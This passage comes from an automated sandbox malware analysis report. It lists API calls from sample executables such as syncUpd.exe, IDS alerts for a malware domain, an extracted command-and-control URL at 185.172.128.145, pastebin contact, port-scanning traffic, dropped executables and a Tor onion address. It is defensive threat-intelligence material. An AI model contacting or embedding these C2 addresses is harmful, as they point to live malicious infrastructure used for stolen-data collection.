                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_00408123 FindFirstFileA,FindClose,13_2_00408123
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,13_2_004085B8
                  Source: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exeCode function: 13_2_0040342B FindFirstFileA,13_2_0040342B
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeCode function: 14_2_00403432 FindFirstFileA,14_2_00403432
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeCode function: 14_2_00408123 FindFirstFileA,FindClose,14_2_00408123
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeCode function: 14_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,14_2_004085B8
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_0040D540
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_00412570
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,15_2_0040D1C0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_004015C0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,15_2_004121F0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,15_2_00411650
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,15_2_0040B610
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,15_2_0040DB60
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,15_2_00411B80
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_009018B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,15_2_009018B7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_008F1827
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,15_2_008FD427
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00902457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,15_2_00902457
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,15_2_008FB877
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,15_2_008FDDC7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00901DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,15_2_00901DE7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008FD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_008FD7A7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_009027D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,15_2_009027D7
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\logo.png
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\qrcode.png

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2856463 ETPRO TROJAN DNS Query to Hello2Malware Domain 192.168.2.5:51596 -> 1.1.1.1:53
                  Source: TrafficSnort IDS: 2856466 ETPRO TROJAN Observed Hello2Malware Domain in TLS SNI 192.168.2.5:55130 -> 104.21.54.158:443
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://185.172.128.145/3cd2b41cbde8fc9c.php
                  Source: Malware configuration extractorURLs: http://185.172.128.145/3cd2b41cbde8fc9c.php
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: pastebin.com
                  Connects to many IPs within the same subnet mask (likely port scanning)
                  Source: global trafficTCP traffic: Count: 12 IPs: 212.110.188.222,212.110.188.189,212.110.188.211,212.110.188.202,212.110.188.213,212.110.188.220,212.110.188.198,212.110.188.193,212.110.188.195,212.110.188.204,212.110.188.216,212.110.188.207
                  Source: global trafficTCP traffic: Count: 10 IPs: 103.47.93.248,103.47.93.237,103.47.93.236,103.47.93.223,103.47.93.227,103.47.93.238,103.47.93.194,103.47.93.244,103.47.93.210,103.47.93.252
                  Source: global trafficTCP traffic: Count: 12 IPs: 188.132.222.194,188.132.222.141,188.132.222.7,188.132.222.167,188.132.222.9,188.132.222.4,188.132.222.3,188.132.222.5,188.132.222.51,188.132.222.23,188.132.222.12,188.132.222.14
                  Source: global trafficTCP traffic: Count: 10 IPs: 72.10.160.170,72.10.160.91,72.10.160.90,72.10.160.174,72.10.160.173,72.10.160.172,72.10.160.171,72.10.160.93,72.10.160.92,72.10.160.94
                  Source: global trafficTCP traffic: Count: 13 IPs: 162.159.242.109,162.159.242.7,162.159.242.10,162.159.242.230,162.159.242.252,162.159.242.150,162.159.242.62,162.159.242.45,162.159.242.138,162.159.242.8,162.159.242.158,162.159.242.104,162.159.242.159
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 103.216.51.36 ports 0,2,3,32650,5,6
                  Source: global trafficTCP traffic: 62.171.131.101 ports 41055,25847,0,3,35006,5,6,37447
                  Source: global trafficTCP traffic: 45.11.95.166 ports 6014,6002,6005,6004,6015,0,6,9,6009
                  Source: global trafficTCP traffic: 163.172.166.35 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 45.11.95.165 ports 6010,6012,5043,6014,5023,5047,6038,5025,5003,5038,5039,6009,5219,5034,5211,6027,5212,6048,0,2,6,7,5005,5049,6039,5028
                  Source: global trafficTCP traffic: 207.180.234.220 ports 45876,48963,47476,39323,42823,3,4,6,8,9,30507,39737,37736
                  Source: global trafficTCP traffic: 183.96.235.105 ports 18572,1,2,5,7,8
                  Source: global trafficTCP traffic: 164.92.86.113 ports 64110,54093,63358,57391,55651,4,5,7,54597,9,50564,60283
                  Source: global trafficTCP traffic: 162.214.102.195 ports 34227,2,56755,3,4,58994,7,60891,50366
                  Source: global trafficTCP traffic: 46.219.80.142 ports 0,1,4,5,7,57401
                  Source: global trafficTCP traffic: 43.155.142.116 ports 15673,1,3,5,6,7
                  Source: global trafficTCP traffic: 107.180.88.173 ports 44568,0,2,5,59820,8,9,36503
                  Source: global trafficTCP traffic: 166.62.38.100 ports 8730,56191,0,3,7,8,39308,32216
                  Source: global trafficTCP traffic: 162.241.6.97 ports 63360,41274,46783,59991,44607,45629,1,31794,5,50563,60651,9
                  Source: global trafficTCP traffic: 72.167.38.7 ports 45650,0,4,5,6,62191
                  Source: global trafficTCP traffic: 162.241.158.204 ports 63360,41274,46783,59991,44607,1,31794,5,52980,50563,60651,9
                  Source: global trafficTCP traffic: 37.187.77.58 ports 49507,64494,14470,21861,59870,52593,31355,1,2,3,3139,4,13412,18936,13574,37920,19767,10710,29380
                  Source: global trafficTCP traffic: 92.204.135.37 ports 26927,63462,16591,8623,22942,62969,2,58604,6,7,9,20491,55019,51229,34824,32524,33899
                  Source: global trafficTCP traffic: 194.31.79.75 ports 25517,25900,1,2,5,31471,7
                  Source: global trafficTCP traffic: 161.97.147.193 ports 15371,19655,2,3,8,2838
                  Source: global trafficTCP traffic: 41.217.223.145 ports 0,2,3,32650,5,6
                  Source: global trafficTCP traffic: 72.10.160.91 ports 19731,17037,7895,8171,26973,1,2367,7,8
                  Source: global trafficTCP traffic: 72.10.160.90 ports 8633,5661,24201,21409,29129,3847,22181,3,27031,6,8,13643,8811,8707,17601
                  Source: global trafficTCP traffic: 72.10.160.93 ports 25873,8481,2,3,5,7,8
                  Source: global trafficTCP traffic: 72.10.160.172 ports 15991,20339,3161,2,27283,3,31345,7,8
                  Source: global trafficTCP traffic: 72.10.160.171 ports 25921,0,1,28103,5,5105,5369
                  Source: global trafficTCP traffic: 130.255.162.199 ports 20398,44234,0,1,2,3,12703,7
                  Source: global trafficTCP traffic: 154.12.253.232 ports 12263,1,2,5,7,52127
                  Source: global trafficTCP traffic: 62.182.114.164 ports 2,3,5,6,59623,9
                  Source: global trafficTCP traffic: 51.222.241.157 ports 40351,22538,44029,51718,36363,27206,5717,2,3,5,30011,2563,8,46286
                  Source: global trafficTCP traffic: 128.199.221.91 ports 7176,17532,49865,8004,33383,21605,0,1,2,5,6,50223,30447
                  Source: global trafficTCP traffic: 167.172.109.12 ports 39452,46249,39533,37355,40825,2,4,6,9,41491
                  Source: global trafficTCP traffic: 161.97.173.42 ports 44479,62289,3,5,7,5379,37455,9,15015,53948
                  Source: global trafficTCP traffic: 185.109.184.150 ports 0,63819,56067,5,6,7
                  Source: global trafficTCP traffic: 37.187.91.192 ports 21981,27898,0,1,5,6,7,17605
                  Source: global trafficTCP traffic: 122.70.153.17 ports 24138,1,2,3,4,8
                  Source: global trafficTCP traffic: 107.180.88.41 ports 37597,24834,3,58037,5,57642,7,9
                  Source: global trafficTCP traffic: 154.79.254.236 ports 0,2,3,32650,5,6
                  Source: global trafficTCP traffic: 162.214.227.68 ports 43435,48414,45540,34071,55392,3,55029,60433,6,7,56796,31825,9,37976,52208
                  Source: global trafficTCP traffic: 148.72.206.84 ports 0,30651,1,2536,3,14815,5,6,58842,34761
                  Source: global trafficTCP traffic: 207.180.198.241 ports 37443,45718,2,57327,3,5,7,55823,17228,37209
                  Source: global trafficTCP traffic: 132.148.154.97 ports 0,60349,3,4,10958,6,9
                  Source: global trafficTCP traffic: 161.97.163.52 ports 64120,32092,64109,0,30189,1,28593,31125,4,34586,6,9,55109,34916
                  Source: global trafficTCP traffic: 88.119.139.237 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 162.241.137.197 ports 42350,40604,3,4,34455,5,6,60200,36534,61041
                  Source: global trafficTCP traffic: 91.142.222.84 ports 22735,57041,1,2,6,12266
                  Source: global trafficTCP traffic: 64.202.186.2 ports 42587,2,1258,32884,4,5,7,8
                  Source: global trafficTCP traffic: 162.241.46.54 ports 58330,46849,0,3,5,53783,8
                  Source: global trafficTCP traffic: 43.133.71.20 ports 15673,1,3,5,6,7
                  Source: global trafficTCP traffic: 51.158.77.220 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 162.214.225.223 ports 37581,43435,54917,48414,63452,49227,43265,34071,58240,49806,40536,1,2,36129,3,55029,6,55742,9,50753,39824
                  Source: global trafficTCP traffic: 208.87.131.240 ports 41368,22566,1,3,4,6,8
                  Source: global trafficTCP traffic: 51.38.63.124 ports 2,27294,4,7,9,10983
                  Source: global trafficTCP traffic: 67.227.186.83 ports 56370,0,3,5,6,7
                  Source: global trafficTCP traffic: 194.163.159.93 ports 35081,0,1,3,5,8
                  Source: global trafficTCP traffic: 165.227.196.37 ports 53718,61899,63637,1,56755,3,5,7,8
                  Source: global trafficTCP traffic: 51.81.186.179 ports 0,3,5,58630,6,8
                  Source: global trafficTCP traffic: 146.59.18.246 ports 9755,15860,40975,25810,58031,0,30673,2,29066,6,9,49871
                  Source: global trafficTCP traffic: 148.66.130.53 ports 7830,31907,56350,23998,2,3,8,9,47891,13305,54209
                  Source: global trafficTCP traffic: 219.243.212.118 ports 1080,8443,8080,0,1,8
                  Source: global trafficTCP traffic: 50.63.12.33 ports 9367,23859,61464,0,2,31785,14738,25492,4,50781,5,22450,52814
                  Source: global trafficTCP traffic: 51.15.230.100 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 162.240.72.139 ports 20614,3,4,5,7,37445
                  Source: global trafficTCP traffic: 51.89.173.40 ports 17982,27887,3100,26545,54570,23854,20435,0,30199,55198,4,60775,5,7,11058,31724
                  Source: global trafficTCP traffic: 202.142.159.204 ports 0,1,2,3,31026,6
                  Source: global trafficTCP traffic: 92.205.107.159 ports 57238,2,3,5,7,8
                  Source: global trafficTCP traffic: 191.53.112.170 ports 45619,1,4,5,6,9
                  Source: global trafficTCP traffic: 159.223.71.71 ports 59243,56581,1,59159,52542,61818,5,51187,60377,7,8,51213,64193
                  Source: global trafficTCP traffic: 111.92.164.242 ports 2,3,4,5,7,52347
                  Source: global trafficTCP traffic: 146.59.70.29 ports 2,5,6,52276,7,37665
                  Source: global trafficTCP traffic: 185.23.118.252 ports 0,1,3,5,7,53701
                  Source: global trafficTCP traffic: 38.54.95.19 ports 8060,0,3128,9080,8,9
                  Source: global trafficTCP traffic: 162.214.121.173 ports 64579,44826,62976,35183,4,5,6,33572,7,9,64382
                  Source: global trafficTCP traffic: 20.24.43.214 ports 8123,1,2,3,8,80
                  Source: global trafficTCP traffic: 92.205.61.38 ports 50903,21286,4300,29249,36073,0,24183,3,6,7
                  Source: global trafficTCP traffic: 162.241.46.40 ports 62592,62244,41442,49401,56241,34172,61579,2,5,6,9,46097
                  Source: global trafficTCP traffic: 195.154.43.184 ports 1,3,5,7,31957,9
                  Source: global trafficTCP traffic: 208.109.14.49 ports 63470,37377,11426,3,7,42072,11733
                  Source: global trafficTCP traffic: 5.252.23.249 ports 1080,1,2,3,3128,8
                  Source: global trafficTCP traffic: 173.212.209.49 ports 39522,44416,64309,1,31673,4,6,58827
                  Source: global trafficTCP traffic: 66.228.35.209 ports 17464,14321,56560,0,4,44809,8,9
                  Source: global trafficTCP traffic: 148.72.212.183 ports 45012,2792,0,1,2,4,5
                  Source: global trafficTCP traffic: 5.252.23.220 ports 1080,1081,0,1,3128,8
                  Source: global trafficTCP traffic: 148.72.212.198 ports 35264,0,3,5,9,3950
                  Source: global trafficTCP traffic: 151.236.39.7 ports 57248,2,4,5,59202,7,8
                  Source: global trafficTCP traffic: 107.180.90.88 ports 8078,63100,20309,0,2,55347,62908,6,8,9,64081,7936
                  Source: global trafficTCP traffic: 94.23.220.136 ports 43751,25256,2,5,6,21062
                  Source: global trafficTCP traffic: 162.241.46.6 ports 62244,60708,61579,34172,50062,2,4,6,46097
                  Source: global trafficTCP traffic: 66.42.60.190 ports 21358,1,2,3,5,8
                  Source: global trafficTCP traffic: 62.205.169.74 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 162.241.53.72 ports 57495,57364,3,4,5,6,7,53755,31414,62192
                  Source: global trafficTCP traffic: 37.187.73.7 ports 23637,12582,16113,2,3,6,7
                  Source: global trafficTCP traffic: 41.85.189.66 ports 39475,3,4,5,7,9
                  Source: global trafficTCP traffic: 77.65.50.118 ports 1,3,34159,4,5,9
                  Source: global trafficTCP traffic: 147.124.212.31 ports 11070,0,1,24230,7,51825
                  Source: global trafficTCP traffic: 62.112.11.204 ports 1,2,3,4,6,26431
                  Source: global trafficTCP traffic: 104.238.111.107 ports 5484,5452,3230,26305,23667,56225,2,30026,5,36049,6,7999
                  Source: global trafficTCP traffic: 51.158.96.66 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 43.255.113.232 ports 8082,8083,8080,8084,0,2,8,80,84
                  Source: global trafficTCP traffic: 37.228.65.107 ports 0,1,2,51032,3,5
                  Source: global trafficTCP traffic: 51.158.105.107 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 194.233.78.142 ports 49628,35760,34471,1,35513,3,5
                  Source: global trafficTCP traffic: 92.204.134.38 ports 52929,25825,9375,15393,7785,42571,25675,29718,25416,3,1555,55425,56177,5,54467,28695,7,51123,30747,9,59727
                  Source: global trafficTCP traffic: 52.67.10.183 ports 1,2,3,3128,8,80
                  Source: global trafficTCP traffic: 88.202.230.103 ports 17045,8896,0,1,13638,4,5,7
                  Source: global trafficTCP traffic: 67.213.212.50 ports 28965,2,5,6,8,9
                  Source: global trafficTCP traffic: 197.232.36.85 ports 41890,0,1,4,8,9
                  Source: global trafficTCP traffic: 162.144.36.208 ports 27829,38242,2,27531,31683,7,8,9
                  Source: global trafficTCP traffic: 181.212.136.34 ports 5199,1,5,7,8,7518
                  Source: global trafficTCP traffic: 132.148.6.255 ports 20859,0,2,5,8,9
                  Source: global trafficTCP traffic: 132.148.245.169 ports 38780,19483,0,3,7,8
                  Source: global trafficTCP traffic: 162.210.192.136 ports 0,57403,3,4,5,7
                  Source: global trafficTCP traffic: 210.5.10.87 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 72.167.222.113 ports 39574,12581,2,41629,4,8,4125,9,48892
                  Source: global trafficTCP traffic: 79.101.55.161 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 67.43.227.228 ports 26903,19479,6643,9039,1031,26957,0,1,3,31581,15753
                  Source: global trafficTCP traffic: 67.43.227.226 ports 1,2,4,5,7,32583,12745
                  Source: global trafficTCP traffic: 114.6.25.5 ports 65432,2,3,4,5,6
                  Source: global trafficTCP traffic: 94.247.241.70 ports 0,3,4,5,6,53640
                  Source: global trafficTCP traffic: 51.79.87.144 ports 41230,8533,22500,41746,0,30464,3,54395,4,6,18636
                  Source: global trafficTCP traffic: 217.23.11.194 ports 32708,0,2,3,7,8,47152
                  Source: global trafficTCP traffic: 51.68.164.77 ports 16892,1,2,6,8,9,54504,32824
                  Source: global trafficTCP traffic: 159.223.166.21 ports 5078,1372,45537,0,4,25154,6,7,47460
                  Source: global trafficTCP traffic: 31.24.44.92 ports 1,2,52173,3,5,7,50687
                  Source: global trafficTCP traffic: 67.43.228.253 ports 14493,18753,19425,18153,5189,4321,24269,25379,1,14869,3,12549,5,1277,7,8,11089,13873,9713,31947,30913,15961,32923
                  Source: global trafficTCP traffic: 67.43.228.251 ports 21223,24985,5,1265,9,5999
                  Source: global trafficTCP traffic: 148.72.209.174 ports 38088,39027,3,4,29544,7,39458,2906,16203,4734
                  Source: global trafficTCP traffic: 50.63.12.101 ports 61797,3580,6095,0,1,10647,4,6,7,17559
                  Source: global trafficTCP traffic: 77.238.79.111 ports 8080,5,6,7,8,5678
                  Source: global trafficTCP traffic: 198.12.255.193 ports 9375,22785,53281,3,5,7,6821,9,51612,48572
                  Source: global trafficTCP traffic: 209.222.97.30 ports 19481,1,15805,4,8,9
                  Source: global trafficTCP traffic: 66.29.129.54 ports 47036,0,3,4,6,7
                  Source: global trafficTCP traffic: 139.162.238.184 ports 21017,39652,22243,29870,2,3,4,13302
                  Source: global trafficTCP traffic: 36.67.27.189 ports 39674,3,4,6,7,9
                  Source: global trafficTCP traffic: 51.161.131.84 ports 63055,43712,25843,0,58612,2,4,49202,9,19987
                  Source: global trafficTCP traffic: 117.160.250.163 ports 8080,8081,9990,0,8,80,81,9999,82,8828
                  Source: global trafficTCP traffic: 51.75.126.150 ports 36580,19693,36694,15474,21803,64615,2,3,11802,35632,5,6,34144,4228,37847
                  Source: global trafficTCP traffic: 209.126.104.38 ports 44412,40053,40750,1,2,4,5,7,12457
                  Source: global trafficTCP traffic: 186.215.87.194 ports 8893,6032,8891,6000,6016,0,6,6009,6008
                  Source: global trafficTCP traffic: 132.148.129.254 ports 0,1,6,7,8,60781
                  Source: global trafficTCP traffic: 166.159.90.56 ports 53281,1,2,3,5,8
                  Source: global trafficTCP traffic: 132.148.167.243 ports 0,1,2,7,48298,28040,17702
                  Source: global trafficTCP traffic: 140.227.61.156 ports 23456,2,3,4,5,6
                  Source: global trafficTCP traffic: 51.158.98.211 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 67.43.236.20 ports 24517,17167,14397,8675,8973,32083,22653,9681,20657,27945,30761,2169,11729,5599,8209,9617,7315,12239,15229,17845,18445,20685,11591,19355,6961,26169,25633,8141,4081,24603,0,16829,13959,2,11957,3389,8,9
                  Source: global trafficTCP traffic: 72.10.164.178 ports 26959,16593,5043,13341,24431,8293,23305,5959,31871,1953,2589,29389,3113,17803,10235,12613,19511,24847,24769,7037,5673,15891,23871,25799,4519,2,10801,5,6,2893,9,15677,31805,29471,5747
                  Source: global trafficTCP traffic: 162.241.45.22 ports 50528,44931,63501,0,1,5,6,55610
                  Source: global trafficTCP traffic: 171.244.140.160 ports 15141,5189,62310,14253,56076,24015,0,1,2,31643,27020,4,5,27056,37400,53749,8826,34559
                  Source: global trafficTCP traffic: 95.217.104.21 ports 24815,1,2,4,5,8
                  Source: global trafficTCP traffic: 93.190.142.57 ports 41890,0,1,4,26541,8,9
                  Source: global trafficTCP traffic: 162.214.197.102 ports 42019,0,3,4,6,46430
                  Source: global trafficTCP traffic: 62.122.201.246 ports 0,1,2,5,9,50129
                  Source: global trafficTCP traffic: 51.158.111.76 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 162.241.79.22 ports 1,3,5,52048,8,35318
                  Source: global trafficTCP traffic: 184.178.172.28 ports 15294,1,2,4,5,9
                  Source: global trafficTCP traffic: 91.134.140.160 ports 20896,16487,48962,49687,2572,56495,57320,27207,9141,32896,32588,1,53012,30895,11946,3,5,8879,5401,51513,39803,49042,12217
                  Source: global trafficTCP traffic: 160.153.245.187 ports 38586,35138,59786,5,6,7,8,9,6116,31745
                  Source: global trafficTCP traffic: 51.178.182.200 ports 1,2,3,6,7,63172
                  Source: global trafficTCP traffic: 184.178.172.18 ports 15280,0,1,2,5,8
                  Source: global trafficTCP traffic: 45.81.232.17 ports 27855,59421,54393,23711,1,2,30696,4,8,47056,21481,4715
                  Source: global trafficTCP traffic: 51.158.79.76 ports 1,3,6,7,9,16379
                  Source: global trafficTCP traffic: 72.195.34.35 ports 0,2,27360,3,6,7
                  Source: global trafficTCP traffic: 107.180.90.248 ports 7698,6,7,8,9,43240
                  Source: global trafficTCP traffic: 159.89.163.18 ports 1,2,3,23196,6,9
                  Creates HTML files with .exe extension (expired dropper behavior)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: TZPggM3oFTuVSt5WXyjCPa4K.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: xBWhJ9fAo9Iu3r2QPWYsNC0n.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: RO84xP5vKtm7omg9lbXhIpkf.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: UVLurWz0zwkQqd3HayB6HEY3.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: hPHTonYP7RyWeeJ9W9mN2cDP.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: vODV6f1qBtycrG7AEUewXqSZ.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: CmJh7R2E5otxAzC6csQzhhaB.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: BDWPWht51PAB6sI39ee6Tgbk.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: kX0DCdsflvJ8OvgZffzyMO8W.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: SNzmN8HQUSehVCgProaZjQEN.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: hYAqUmuBImuV2jtG2ViGAgNj.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: nqutQ9rgLeAHNtyWdA1aXp1F.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: hLn9pwL7ypoVxhun396wpKec.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: PsfJgdgdADnk5mVYPGyLWZVX.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: nhgjWSGzWIq986x3kQ3u2YHN.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: VeFiHaAJqD2MVtOotjaLLiHl.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: qn8N72lxWeACAPN7HO6efjE8.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: pxWKg4zxasESusqXOZSGu1mj.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: iiQFQ7OxLxWbyS9Pg6suKg1w.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: FH9ZiJrSMFU3hHrXc5ibJbFE.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: vMoYM4QnB4Nb0GDoD23L7m4o.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: 1DHjR2vk6vS49GBZmU2Ta1ix.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: xKfa5BEne98Q6CDxSSuxDfob.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: MGrpLGlRfDrqJ61XW6iUbDIW.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: LWWSU1hBkg5pZ7zlASflOaPe.exe.5.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: wgtZ5oDAxtz8XmZjy9Pg8rRQ.exe.5.dr
                  Found Tor onion address
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exeString found in binary or memory: s25519: internal error: setShortBytes called with a long stringhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)http://vcr4vuv4sf5233btfy7xboezl7umjw7rljdmaeztmmf4s6k2ivinj3yd.oniontls: handshake message of length %d bytes exceeds maximum o
